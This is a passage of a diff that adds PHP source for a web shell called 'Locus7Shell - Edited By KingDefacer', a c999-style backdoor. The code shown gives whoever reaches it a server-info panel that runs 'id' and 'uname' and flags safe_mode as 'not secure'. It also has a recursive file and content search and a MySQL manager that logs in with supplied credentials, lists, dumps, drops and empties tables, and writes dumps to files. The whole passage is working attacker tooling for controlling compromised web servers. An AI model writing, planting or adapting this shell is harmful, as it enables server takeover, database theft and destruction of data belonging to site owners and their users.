+# MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"."
+# Date: ".date("d.m.Y H:i:s")."
+# DB: \"".$db."\"
+#---------------------------------------------------------
+";
+$c = count($onlytabs);
+foreach($tabs as $tab)
+{
+  if ((in_array($tab,$onlytabs)) or (!$c))
+  {
+   if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";}
+   // recieve query for create table structure
+   $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock);
+   if (!$res) {$ret["err"][] = mysql_smarterror();}
+   else
+   {
+    $row = mysql_fetch_row($res);
+    $out .= $row["1"].";\n\n";
+    // recieve table variables
+    $res = mysql_query("SELECT * FROM `$tab`", $sock);
+    if (mysql_num_rows($res) > 0)
+    {
+     while ($row = mysql_fetch_assoc($res))
+     {
+      $keys = implode("`, `", array_keys($row));
+      $values = array_values($row);
+      foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
+      $values = implode("', '", $values);
+      $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n";
+      $out .= $sql;
+     }
+    }
+   }
+  }
+}
+$out .= "#---------------------------------------------------------------------------------\n\n";
+if ($file)
+{
+  $fp = fopen($file, "w");
+  if (!$fp) {$ret["err"][] = 2;}
+  else
+  {
+   fwrite ($fp, $out);
+   fclose ($fp);
+  }
+}
+if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}}
+return $out;
+}
+}
+if (!function_exists("mysql_buildwhere"))
+{
+function mysql_buildwhere($array,$sep=" and",$functs=array())
+{
+if (!is_array($array)) {$array = array();}
+$result = "";
+foreach($array as $k=>$v)
+{
+  $value = "";
+  if (!empty($functs[$k])) {$value .= $functs[$k]."(";}
+  $value .= "'".addslashes($v)."'";
+  if (!empty($functs[$k])) {$value .= ")";}
+  $result .= "`".$k."` = ".$value.$sep;
+}
+$result = substr($result,0,strlen($result)-strlen($sep));
+return $result;
+}
+}
+if (!function_exists("mysql_fetch_all"))
+{
+function mysql_fetch_all($query,$sock)
+{
+if ($sock) {$result = mysql_query($query,$sock);}
+else {$result = mysql_query($query);}
+$array = array();
+while ($row = mysql_fetch_array($result)) {$array[] = $row;}
+mysql_free_result($result);
+return $array;
+}
+}
+if (!function_exists("mysql_smarterror"))
+{
+function mysql_smarterror($type,$sock)
+{
+if ($sock) {$error = mysql_error($sock);}
+else {$error = mysql_error();}
+$error = htmlspecialchars($error);
+return $error;
+}
+}
+if (!function_exists("mysql_query_form"))
+{
+function mysql_query_form()
+{
+global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct;
+if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
+if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
+if ((!$submit) or ($sql_act))
+{
+  echo "<table border=0><tr><td><form name=\"c999sh_sqlquery\" method=POST><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":</b><br><br><textarea name=sql_query cols=100 rows=10>".htmlspecialchars($sql_query)."</textarea><br><br><input type=hidden name=act value=sql><input type=hidden name=sql_act value=query><input type=hidden name=sql_tbl value=\"".htmlspecialchars($sql_tbl)."\"><input type=hidden name=submit value=\"1\"><input type=hidden name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=submit name=sql_confirm value=\"Yes\">&nbsp;<input type=submit value=\"No\"></form></td>";
+  if ($tbl_struct)
+  {
+   echo "<td valign=\"top\"><b>Fields:</b><br>";
+   foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "+ <a href=\"#\" onclick=\"document.c999sh_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br>";}
+   echo "</td></tr></table>";
+  }
+}
+if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;}
+}
+}
+if (!function_exists("mysql_create_db"))
+{
+function mysql_create_db($db,$sock="")
+{
+$sql = "CREATE DATABASE `".addslashes($db)."`;";
+if ($sock) {return mysql_query($sql,$sock);}
+else {return mysql_query($sql);}
+}
+}
+if (!function_exists("mysql_query_parse"))
+{
+function mysql_query_parse($query)
+{
+$query = trim($query);
+$arr = explode (" ",$query);
+/*array array()
+{
+  "METHOD"=>array(output_type),
+  "METHOD1"...
+  ...
+}
+if output_type == 0, no output,
+if output_type == 1, no output if no error
+if output_type == 2, output without control-buttons
+if output_type == 3, output with control-buttons
+*/
+$types = array(
+  "SELECT"=>array(3,1),
+  "SHOW"=>array(2,1),
+  "DELETE"=>array(1),
+  "DROP"=>array(1)
+);
+$result = array();
+$op = strtoupper($arr[0]);
+if (is_array($types[$op]))
+{
+  $result["propertions"] = $types[$op];
+  $result["query"]  = $query;
+  if ($types[$op] == 2)
+  {
+   foreach($arr as $k=>$v)
+   {
+    if (strtoupper($v) == "LIMIT")
+    {
+     $result["limit"] = $arr[$k+1];
+     $result["limit"] = explode(",",$result["limit"]);
+     if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);}
+     unset($arr[$k],$arr[$k+1]);
+    }
+   }
+  }
+}
+else {return FALSE;}
+}
+}
+if (!function_exists("c999fsearch"))
+{
+function c999fsearch($d)
+{
+global $found;
+global $found_d;
+global $found_f;
+global $search_i_f;
+global $search_i_d;
+global $a;
+if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+$h = opendir($d);
+while (($f = readdir($h)) !== FALSE)
+{
+  if($f != "." && $f != "..")
+  {
+   $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== FALSE) || ($a["name_regexp"] and ereg($a["name"],$f));
+   if (is_dir($d.$f))
+   {
+    $search_i_d++;
+    if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;}
+    if (!is_link($d.$f)) {c999fsearch($d.$f);}
+   }
+   else
+   {
+    $search_i_f++;
+    if ($bool)
+    {
+     if (!empty($a["text"]))
+     {
+      $r = @file_get_contents($d.$f);
+      if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";}
+      if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);}
+      if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);}
+      else {$bool = strpos(" ".$r,$a["text"],1);}
+      if ($a["text_not"]) {$bool = !$bool;}
+      if ($bool) {$found[] = $d.$f; $found_f++;}
+     }
+     else {$found[] = $d.$f; $found_f++;}
+    }
+   }
+  }
+}
+closedir($h);
+}
+}
+
+if ($act == "gofile") {if (is_dir($f)) {$act = "ls"; $d = $f;} else {$act = "f"; $d = dirname($f); $f = basename($f);}}
+//Sending headers
+@ob_start();
+@ob_implicit_flush(0);
+function onphpshutdown()
+{
+global $gzipencode,$ft;
+if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad")))
+{
+  $v = @ob_get_contents();
+  @ob_end_clean();
+  @ob_start("ob_gzHandler");
+  echo $v;
+  @ob_end_flush();
+}
+}
+function c999shexit()
+{
+onphpshutdown();
+exit;
+}
+header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
+header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT");
+header("Cache-Control: no-store, no-cache, must-revalidate");
+header("Cache-Control: post-check=0, pre-check=0", FALSE);
+header("Pragma: no-cache");
+if (empty($tmpdir))
+{
+$tmpdir = ini_get("upload_tmp_dir");
+if (is_dir($tmpdir)) {$tmpdir = "/tmp/";}
+}
+$tmpdir = realpath($tmpdir);
+$tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir);
+if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;}
+if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;}
+else {$tmpdir_logs = realpath($tmpdir_logs);}
+if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
+{
+$safemode = TRUE;
+$hsafemode = "<font color=red>ON (secure)</font>";
+}
+else {$safemode = FALSE; $hsafemode = "<font color=green>OFF (not secure)</font>";}
+$v = @ini_get("open_basedir");
+if ($v or strtolower($v) == "on") {$openbasedir = TRUE; $hopenbasedir = "<font color=red>".$v."</font>";}
+else {$openbasedir = FALSE; $hopenbasedir = "<font color=green>OFF (not secure)</font>";}
+$sort = htmlspecialchars($sort);
+if (empty($sort)) {$sort = $sort_default;}
+$sort[1] = strtolower($sort[1]);
+$DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE");
+if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();}
+$DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"<a href=\"".$surl."act=phpinfo\" target=\"_blank\"><b><u>PHP/".phpversion()."</u></b></a>",htmlspecialchars($DISP_SERVER_SOFTWARE));
+@ini_set("highlight.bg",$highlight_bg); //FFFFFF
+@ini_set("highlight.comment",$highlight_comment); //#FF8000
+@ini_set("highlight.default",$highlight_default); //#0000BB
+@ini_set("highlight.html",$highlight_html); //#000000
+@ini_set("highlight.keyword",$highlight_keyword); //#007700
+@ini_set("highlight.string",$highlight_string); //#DD0000
+if (!is_array($actbox)) {$actbox = array();}
+$dspact = $act = htmlspecialchars($act);
+$disp_fullpath = $ls_arr = $notls = null;
+$ud = urlencode($d);
+?><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><meta http-equiv="Content-Language" content="en-us"><title><?php echo getenv("HTTP_HOST"); ?> - Locus7Shell - Edited By KingDefacer</title><STYLE>TD { FONT-SIZE: 8pt; COLOR: #009900; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #009900; scrollbar-shadow-color: #000000; scrollbar-highlight-color: #00CC00; scrollbar-3dlight-color: #00CC00; scrollbar-darkshadow-color: #009900; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: Verdana;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #000000; COLOR: green; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #009900; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #f89521; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #f89521; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #f89521; TEXT-DECORATION: none;}A:hover { COLOR: #f89521; TEXT-DECORATION: bold;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #009900; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #009900; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #009900; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #009900; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #009900; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}iframe {background-color: #009900; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #009900; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #009900;}body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}</style></head><BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0><center><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2">
+</th></tr><tr><td><p align="left"><b>Software:&nbsp;<?php echo $DISP_SERVER_SOFTWARE; ?></b>&nbsp;</p><p align="left"><b>uname -a:&nbsp;<?php echo wordwrap(php_uname(),90,"<br>",1); ?></b>&nbsp;</p><p align="left"><b><?php if (!$win) {echo wordwrap(myshellexec("id"),90,"<br>",1);} else {echo get_current_user();} ?></b>&nbsp;</p><p align="left"><b>Safe-mode:&nbsp;<?php echo $hsafemode; ?></b></p><p align="left"><?php
+$d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);}
+$d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+$d = str_replace("\\\\","\\",$d);
+$dispd = htmlspecialchars($d);
+$pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1));
+$i = 0;
+foreach($pd as $b)
+{
+$t = "";
+$j = 0;
+foreach ($e as $r)
+{
+  $t.= $r.DIRECTORY_SEPARATOR;
+  if ($j == $i) {break;}
+  $j++;
+}
+echo "<a href=\"".$surl."act=ls&d=".urlencode($t)."&sort=".$sort."\"><b>".htmlspecialchars($b).DIRECTORY_SEPARATOR."</b></a>";
+$i++;
+}
+echo "&nbsp;&nbsp;&nbsp;";
+if (is_writable($d))
+{
+$wd = TRUE;
+$wdt = "<font color=green>[ ok ]</font>";
+echo "<b><font color=green>".view_perms(fileperms($d))."</font></b>";
+}
+else
+{
+$wd = FALSE;
+$wdt = "<font color=red>[ Read-Only ]</font>";
+echo "<b>".view_perms_color($d)."</b>";
+}
+if (is_callable("disk_free_space"))
+{
+$free = disk_free_space($d);
+$total = disk_total_space($d);
+if ($free === FALSE) {$free = 0;}
+if ($total === FALSE) {$total = 0;}
+if ($free < 0) {$free = 0;}
+if ($total < 0) {$total = 0;}
+$used = $total-$free;
+$free_percent = round(100/($total/$free),2);
+echo "<br><b>Free ".view_size($free)." of ".view_size($total)." (".$free_percent."%)</b>";
+}
+echo "<br>";
+echo "<b>Your ip: <a href=http://whois.domaintools.com/".$_SERVER["REMOTE_ADDR"].">".$_SERVER["REMOTE_ADDR"]."</a> - Server ip: <a href=http://whois.domaintools.com/".gethostbyname($_SERVER["HTTP_HOST"]).">".gethostbyname($_SERVER["HTTP_HOST"])."</a></b><br/>";
+$letters = "";
+if ($win)
+{
+$v = explode("\\",$d);
+$v = $v[0];
+foreach (range("a","z") as $letter)
+{
+  $bool = $isdiskette = in_array($letter,$safemode_diskettes);
+  if (!$bool) {$bool = is_dir($letter.":\\");}
+  if ($bool)
+  {
+   $letters .= "<a href=\"".$surl."act=ls&d=".urlencode($letter.":\\")."\"".($isdiskette?" onclick=\"return confirm('Make sure that the diskette is inserted properly, otherwise an error may occur.')\"":"").">[ ";
+   if ($letter.":" != $v) {$letters .= $letter;}
+   else {$letters .= "<font color=green>".$letter."</font>";}
+   $letters .= " ]</a> ";
+  }
+}
+if (!empty($letters)) {echo "<b>Detected drives</b>: ".$letters."<br>";}
+}
+if (count($quicklaunch) > 0)
+{
+foreach($quicklaunch as $item)
+{
+  $item[1] = str_replace("%d",urlencode($d),$item[1]);
+  $item[1] = str_replace("%sort",$sort,$item[1]);
+  $v = realpath($d."..");
+  if (empty($v)) {$a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a);}
+  $item[1] = str_replace("%upd",urlencode($v),$item[1]);
+  echo "<a href=\"".$item[1]."\">".$item[0]."</a>&nbsp;&nbsp;&nbsp;&nbsp;";
+}
+}
+echo "</p></td></tr></table><br>";
+if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgcolor=#000000 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">".$donated_html."</td></tr></table><br>";}
+echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgcolor=#000000 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">";
+if ($act == "") {$act = $dspact = "ls";}
+if ($act == "sql")
+{
+$sql_surl = $surl."act=sql";
+if ($sql_login)  {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);}
+if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);}
+if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);}
+if ($sql_port)   {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);}
+if ($sql_db)     {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);}
+$sql_surl .= "&";
+?><h3>Attention! SQL-Manager is <u>NOT</u> ready module! Don't reports bugs.</h3><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><td width="100%" height="1" colspan="2" valign="top"><center><?php
+if ($sql_server)
+{
+  $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd);
+  $err = mysql_smarterror();
+  @mysql_select_db($sql_db,$sql_sock);
+  if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_smarterror();}
+}
+else {$sql_sock = FALSE;}
+echo "<b>SQL Manager:</b><br>";
+if (!$sql_sock)
+{
+  if (!$sql_server) {echo "NO CONNECTION";}
+  else {echo "<center><b>Can't connect</b></center>"; echo "<b>".$err."</b>";}
+}
+else
+{
+  $sqlquicklaunch = array();
+  $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&");
+  $sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl));
+  $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus");
+  $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars");
+  $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes");
+  $sqlquicklaunch[] = array("Logout",$surl."act=sql");
+  echo "<center><b>MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")</b><br>";
+  if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><b>".$item[0]."</b></a> ] ";}}
+  echo "</center>";
+}
+echo "</td></tr><tr>";
+if (!$sql_sock) {?><td width="28%" height="100" valign="top"><center><font size="5"> i </font></center><li>If login is null, login is owner of process.<li>If host is null, host is localhost</b><li>If port is null, port is 3306 (default)</td><td width="90%" height="1" valign="top"><TABLE height=1 cellSpacing=0 cellPadding=0 width="100%" border=0><tr><td>&nbsp;<b>Please, fill the form:</b><table><tr><td><b>Username</b></td><td><b>Password</b>&nbsp;</td><td><b>Database</b>&nbsp;</td></tr><form action="<?php echo $surl; ?>" method="POST"><input type="hidden" name="act" value="sql"><tr><td><input type="text" name="sql_login" value="root" maxlength="64"></td><td><input type="password" name="sql_passwd" value="" maxlength="64"></td><td><input type="text" name="sql_db" value="" maxlength="64"></td></tr><tr><td><b>Host</b></td><td><b>PORT</b></td></tr><tr><td align=right><input type="text" name="sql_server" value="localhost" maxlength="64"></td><td><input type="text" name="sql_port" value="3306" maxlength="6" size="3"></td><td><input type="submit" value="Connect"></td></tr><tr><td></td></tr></form></table></td><?php }
+else
+{
+  //Start left panel
+  if (!empty($sql_db))
+  {
+   ?><td width="25%" height="100%" valign="top"><a href="<?php echo $surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"; ?>"><b>Home</b></a><hr size="1" noshade><?php
+   $result = mysql_list_tables($sql_db);
+   if (!$result) {echo mysql_smarterror();}
+   else
+   {
+    echo "---[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>";
+    $c = 0;
+    while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "<b>+&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>"; mysql_free_result($count); $c++;}
+    if (!$c) {echo "No tables found in database.";}
+   }
+  }
+  else
+  {
+   ?><td width="1" height="100" valign="top"><a href="<?php echo $sql_surl; ?>"><b>Home</b></a><hr size="1" noshade><?php
+   $result = mysql_list_dbs($sql_sock);
+   if (!$result) {echo mysql_smarterror();}
+   else
+   {
+    ?><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><select name="sql_db"><?php
+    $c = 0;
+    $dbs = "";
+    while ($row = mysql_fetch_row($result)) {$dbs .= "<option value=\"".$row[0]."\""; if ($sql_db == $row[0]) {$dbs .= " selected";} $dbs .= ">".$row[0]."</option>"; $c++;}
+    echo "<option value=\"\">Databases (".$c.")</option>";
+    echo $dbs;
+   }
+   ?></select><hr size="1" noshade>Please, select database<hr size="1" noshade><input type="submit" value="Go"></form><?php
+  }
+  //End left panel
+  echo "</td><td width=\"100%\" height=\"1\" valign=\"top\">";
+  //Start center panel
+  $diplay = TRUE;
+  if ($sql_db)
+  {
+   if (!is_numeric($c)) {$c = 0;}
+   if ($c == 0) {$c = "no";}
+   echo "<hr size=\"1\" noshade><center><b>There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db).").<br>";
+   if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";}}
+   echo "</b></center>";
+   $acts = array("","dump");
+   if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+   elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";}
+   elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";}
+   elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+   elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+   elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+   elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+   elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";}
+   elseif ($sql_tbl_act == "insert")
+   {
+    if ($sql_tbl_insert_radio == 1)
+    {
+     $keys = "";
+     $akeys = array_keys($sql_tbl_insert);
+     foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";}
+     if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);}
+     $values = "";
+     $i = 0;
+     foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;}
+     if (!empty($values)) {$values = substr($values,0,strlen($values)-2);}
+     $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );";
+     $sql_act = "query";
+     $sql_tbl_act = "browse";
+    }
+    elseif ($sql_tbl_insert_radio == 2)
+    {
+     $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs);
+     $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;";
+     $result = mysql_query($sql_query) or print(mysql_smarterror());
+     $result = mysql_fetch_array($result, MYSQL_ASSOC);
+     $sql_act = "query";
+     $sql_tbl_act = "browse";
+    }
+   }
+   if ($sql_act == "query")
+   {
+    echo "<hr size=\"1\" noshade>";
+    if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
+    if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
+    if ((!$submit) or ($sql_act)) {echo "<table border=\"0\" width=\"100%\" height=\"1\"><tr><td><form action=\"".$sql_surl."\" method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"100\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"sql_act\" value=\"query\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\">&nbsp;<input type=\"submit\" value=\"No\"></form></td></tr></table>";}
+   }
+   if (in_array($sql_act,$acts))
+   {
+    ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new table:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newtbl"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newtbl" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>Dump DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="dump"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="dump_file" size="30" value="<?php echo "dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"; ?>">&nbsp;<input type="submit" name=\"submit\" value="Dump"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php
+    if (!empty($sql_act)) {echo "<hr size=\"1\" noshade>";}
+    if ($sql_act == "newtbl")
+    {
+
+     echo "<b>";
+     if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";
+    }
+    else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}
+   }
